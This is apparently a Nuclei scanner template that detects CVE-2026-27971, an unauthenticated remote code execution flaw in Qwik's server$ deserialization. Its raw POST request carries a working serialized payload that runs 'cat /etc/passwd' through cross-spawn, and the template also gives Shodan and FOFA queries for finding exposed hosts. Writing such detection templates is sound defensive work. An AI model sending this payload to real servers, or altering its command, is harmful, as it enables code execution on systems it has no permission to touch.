id: CVE-2026-27971

info:
  name: Qwik - Unauthenticated RCE via server$ Deserialization
  author: omarkurt
  severity: critical
  description: |
    Qwik <=1.19.0 contains an insecure deserialization vulnerability in the server$ RPC mechanism, letting unauthenticated attackers execute arbitrary code remotely, exploit requires require() availability at runtime.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, leading to full system compromise.
  remediation: |
    Update to version 1.19.1 or later.
  reference:
    - https://github.com/QwikDev/qwik/security/advisories/GHSA-p9x5-jp3h-96mm
    - https://vulnerabletarget.com/VT-2026-27971
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-27971
    epss-score: 0.26168
    epss-percentile: 0.96391
    cwe-id: CWE-502
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.html:"q:version"
    fofa-query: body="q:version"
  tags: cve,cve2026,qwik,rce,deserialization,vkev

http:
  - raw:
      - |
        POST /?qfunc=sync HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/qwik-json
        X-QRL: sync
        Origin: {{RootURL}}

        {"_objs":["\u0002./node_modules/cross-spawn/index#sync","cat","/etc/passwd",["2"],["0","1","3"]],"_entry":"4"}

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
          - "contains(header, 'application/qwik-json')"
        condition: and
# digest: 4a0a00473045022100df693897fcfdcf53cb1c4905674db4df018427ed25a31ce7e7196ee7cf8e50fa02202039e5a44dbd434f7c84372b37bd77bdc2b8e3da52720dbe42d1ca2ca2480871:922c64590222798bb761d5b6d8e72950